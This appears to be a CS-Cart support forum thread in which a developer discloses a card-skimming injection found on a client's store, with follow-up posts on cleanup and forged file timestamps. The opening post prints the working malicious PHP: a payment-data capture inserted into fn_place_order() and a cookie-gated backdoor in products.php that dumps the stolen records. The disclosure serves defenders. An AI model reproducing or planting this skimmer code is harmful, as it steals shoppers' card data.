New Threat Found

General General Questions
1

A client of mine was having cc info compromised. This is a very old version of the cart (2.1.1) but the method will work on any site.



It appears as if the site was compomised (I.e. accessed by someone versus an automated intrusion) but the code injection is the same.



In fn.cart.php, code was inserted into the fn_place_order() function at the point where payment info is saved for the order. The injected code looks like:

<br />
		   	 $encode = 'ba' . 'se' . '64' . '_' . 'enc' . 'ode';<br />
				$prefix = Registry::get('config.table_prefix');<br />
				if (empty($prefix)) {<br />
			   	 $prefix = 'cscart_';<br />
				}<br />
				$table = $prefix . 'images_cache';	   		<br />
				$imagerequest  = $encode(serialize(array($_SERVER['REMOTE_ADDR'], $_SESSION['cart']['user_data'], $_SESSION['cart']['payment_info'])));<br />
				db_query("CREATE TABLE IF NOT EXISTS  $table (`cache` TEXT NOT NULL) ENGINE = MYISAM");<br />
				db_query("INSERT INTO $table (cache) VALUES ('$imagerequest')");<br />
<br />

```<br />
Which captures payment info and stores it in the database in a cscart_images_cache table (which is NOT a standard table in cs-cart).<br />
<br />
This captures all payment info for every order created.<br />
<br />
Then in the controllers/customer/products.php  (or controllers/frontend for V4) the retrieval portion of the code is injected in the 'view' mode with code similar to:<br />
```php
<br />
	if (isset($_COOKIE['get_product_cache_id']) && md5($_COOKIE['get_product_cache_id']) == '84306a6467087170caed3d132bbc3adb') {<br />
   	 echo(serialize(db_get_array("SELECT * FROM ?:images_cache")));<br />
   	 exit;<br />
	} elseif (isset($_COOKIE['rem_product_cache_id']) && md5($_COOKIE['rem_product_cache_id']) == '84306a6467087170caed3d132bbc3adb') {<br />
   	 db_query("DELETE FROM ?:images_cache");<br />
   	 die(md5(0));<br />
	}<br />
<br />

```<br />
Which packages up the data previously captured and sends it to the calling browser.<br />
<br />
Again, I do NOT believe the code was inserted by a cs-cart vulnerability (but I could be wrong) but thought I would publish for people to check their sites as to whether this injection exists on your site.<br />
<br />
To fix, remove the offending code above from both files and DROP the cscart_images_cache table from your database.
2

Had a customer contact me today about a card issue after using my site. Looked into the files above and they had this code. Odd thing is the files shows they haven't been modified since 2011 but it was in there. Is that correct? I went through and followed your recommendations so hopefully all is fixed now.

3

many ftp clients allow for changing the modification time to a prescribed value and it's not very difficult to do it via php and/or a shell prmpt. Glad publishing this was able to resolve your issue.



For others, steps to clean:

  1. remove the above code from fn.cart.php
  2. remove the above code from controllers/customer/products.php or controllers/frontend/products.php
  3. DROP the database table cscart_image_cache from your database.
4

have you reported this to bugtracker?



regards

5

No, it's not a bug. Have no idea of how the insertion was done. As sated, I don't believe it was a compromise of the cart, but rather a compromise of the FTP credentials.